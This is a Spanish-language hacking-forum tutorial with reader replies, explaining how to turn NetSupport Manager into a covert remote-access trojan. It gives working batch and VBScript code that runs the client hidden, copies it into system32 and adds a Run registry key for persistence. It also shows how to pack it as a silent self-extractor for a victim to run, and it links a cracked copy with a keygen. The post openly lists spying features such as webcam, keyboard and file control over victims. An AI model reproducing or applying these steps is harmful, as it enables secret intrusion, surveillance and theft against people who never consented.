Lo que haremos sera hacerlo "invisible" para que la victima cuando lo ejecute no se de cuenta y tambien añadiremos unos "copy" y unos "reg add" en batch para que la victima solo tenga que ejecutar el troyano una vez y despues nuestro batch lo ejecutara por la victima
.Empecemos por descargarnos el software,lo podeis descargar desde la página oficial www.netsupport-inc.com aunke ai que registrarse i todo ese royo,lo podeis encontrar tambien por taringa (os e aorrado el trabajo en buscarlo
)Dscarga desde Megaupload (con keygen):
http://usuario-buscatelo-tumismo.com
Una vez descargado lo descomprimimos y lo instalamos en la carpeta por defecto.
Ahora vamos al directorio donde se instalo (por defecto C:\Program Files\NetSupport\NetSupport Manager),cuando acabeis de acer mariconadas con el controlador abrir el "pcicfgui.exe" click en "advanced" despues "master profile/edit" nos vamos a "client interface/client settings" y desmarcamos la casilla "icon in system tray" y marcamos la casilla "quiet mode" para ocultar el troyano,guardamos y cerramos.
Despues creamos una carpeta en el escritorio por ejemplo y metemos alli los archivos que nos aran falta para el troyano (client32.exe,client32.ini,nsm.lic,pcicapi.dll,pcichek.dll,pcicl32.dll,tcctl32.dll) copiamos y pegamos.
Lo siguiente es crear nuestros batch para que se inicie automaticamente cada vez que la victima encienda el pc,crearemos nuestro primer batch
[newbies]abrir bloc de notas escribir el codigo y darle a guardar con el formato "*.bat"[/newbies]
Código:
start client32.exe
exit
exit
Este se encargara de ejecutar el troyano,lo guardaremos como "thumbs.bat",crearemos tambien un vbscript para que no se vea la ventana del shell y que no sea tan sospechoso
[newbies]abrir bloc de notas escribir el codigo y darle a guardar con el formato "*.vbs"[/newbies]
Código:
set objshell = createobject("wscript.shell")
objshell.run "thumbs.bat", vbhide
objshell.run "thumbs.bat", vbhide
Lo guardaremos como "vbscript-thumbs.vbs".
Ahora crearemos el que tendra que ejecutar la victima,este se encarga de copiar todos los archivos a system32 y crear una entrada en el registro para que se autoinicie.
Código:
start vbscript-thumbs.vbs
copy "client32.exe" "%windir%\system32" /Y
copy "nsm.lic" "%windir%\system32" /Y
copy "pcicapi.dll" "%windir%\system32" /Y
copy "pcichek.dll" "%windir%\system32" /Y
copy "pcicl32.dll" "%windir%\system32" /Y
copy "tcctl32.dll" "%windir%\system32" /Y
copy "client32.ini" "%windir%\system32" /Y
copy "thumbs.bat" "%windir%\system32" /Y
copy "vbscript-thumbs.vbs" "%windir%\system32" /Y
copy "vbscript-start.vbs" "%windir%\system32" /Y
reg add hkcu\software\microsoft\windows\currentversion\run /v Thumbs /t reg_sz /d %windir%\system32\vbscript-thumbs.vbs /f
exit
copy "client32.exe" "%windir%\system32" /Y
copy "nsm.lic" "%windir%\system32" /Y
copy "pcicapi.dll" "%windir%\system32" /Y
copy "pcichek.dll" "%windir%\system32" /Y
copy "pcicl32.dll" "%windir%\system32" /Y
copy "tcctl32.dll" "%windir%\system32" /Y
copy "client32.ini" "%windir%\system32" /Y
copy "thumbs.bat" "%windir%\system32" /Y
copy "vbscript-thumbs.vbs" "%windir%\system32" /Y
copy "vbscript-start.vbs" "%windir%\system32" /Y
reg add hkcu\software\microsoft\windows\currentversion\run /v Thumbs /t reg_sz /d %windir%\system32\vbscript-thumbs.vbs /f
exit
Lo llamaremos "start.bat" y tambien crearemos el vbscript
Código:
set objshell = createobject("wscript.shell")
objshell.run "start.bat", vbhide
objshell.run "start.bat", vbhide
Guardarlo como "vbscript-start.vbs".
Ya tenemos casi todo echo,al ejecutar el "vbscript-start.vbs" se ejecutara el troyano y se copiara al registro,ahora comprimiremos todos los archivos con "sfx compiler" para que kede uno solo,lo podeis descargar desde http://sfx-compiler.uptodown.com/descargar/.
Ejecutamos sfx compiler y añadimos todos los archivos que tenemos en la carpeta,vamos a "options"
-file to run after extraction: ponemos "vbscript-start.vbs"
-file to run before extraction: <<none>>
-window tittle: lo dejamos en blanco
-custom text: en blanco
-default folder: en blanco
-include folders names in sfx: desmarcado
-display done message: desmarcado
-do not prompt user for folder selection: marcado
-ask user when over writing files: desmarcado
-(seleccionamos windows temp folder)
-ok button caption: en blanco
-cancel button caption: en blanco
-note: en blanco
-banner image: <<none>
Le damos a crear y le ponemos cualkier nombre y ya tendremos nuestro troyano acabado.
Crearemos tambien un desinfectador para borrar el troyano...

Creamos otro batch y le ponemos este codigo:
Código:
del "%windir%\system32\client32.exe" /f /q
del "%windir%\system32\client32.ini" /f /q
del "%windir%\system32\thumbs.bat" /f /q
del "%windir%\system32\vbscript-thumbs.vbs" /f /q
del "%windir%\system32\vbscript-start.vbs" /f /q
del "%windir%\system32\nsm.lic" /f /q
del "%windir%\system32\pcicapi.dll" /f /q
del "%windir%\system32\pcichek.dll" /f /q
del "%windir%\system32\pcicl32.dll" /f /q
del "%windir%\system32\tcctl32.dll" /f /q
reg delete hkcu\software\microsoft\windows\currentversion\run /v Thumbs /f
taskkill -im client32.exe
taskkill -im client32.exe
exit
del "%windir%\system32\client32.ini" /f /q
del "%windir%\system32\thumbs.bat" /f /q
del "%windir%\system32\vbscript-thumbs.vbs" /f /q
del "%windir%\system32\vbscript-start.vbs" /f /q
del "%windir%\system32\nsm.lic" /f /q
del "%windir%\system32\pcicapi.dll" /f /q
del "%windir%\system32\pcichek.dll" /f /q
del "%windir%\system32\pcicl32.dll" /f /q
del "%windir%\system32\tcctl32.dll" /f /q
reg delete hkcu\software\microsoft\windows\currentversion\run /v Thumbs /f
taskkill -im client32.exe
taskkill -im client32.exe
exit
Lo guardamos como desinfectador.bat o lo que kerais vosotros y ya tenemos todo,espero que os aya gustado si copiais este tutorial para otro foro o lo que sea poner que es mio (ASSaulting).
Para dudas responder poniendo vuestra duda
Para critikas y demas comerme los *******
un saludo.Funciones del troyano:
-Ver lo que esta haciendo la victima desde su monitor.
-Controlar el mouse de la victima.
-Controlar el teclado de la victima.
-Transferencia de archivos.
-Descargar archivos.
-Subir archivos.
-Ejecutar archivos remotamente.
-Renombrar archivos.
-Eliminar archivos.
-Iniciar chat con la victima.
-Enviar un mensage a la victima.
-Apagar,reiniciar o cerrar sesion de la victima.
-Ver video y audio de camara web y altavoces.
-Comandos remotos.
-Y alguna cosa mas...
Novlucker ha ayudado ha mejorar el troyano,gracias

Editado:Podeis escribir algunas mejoras para ayudar a todos o tambien si veis algun error,gracias











Autor



En línea




, es como troyanizar un vnc, no le he metido leche pero vamos aver que pasa en la semana.




) donde conecto yo con mis infectados?? es decir dond meto la ip dl infectado o como es.. investigo y no encuentro, saludos.

, pero lo que no me convence es que hay que agregarle varios Mb más, con lo que el SFX resultante pasa de unos 900 kb (que ya no es poco) a unos 3 Mb, así que no creo que valga la pena 
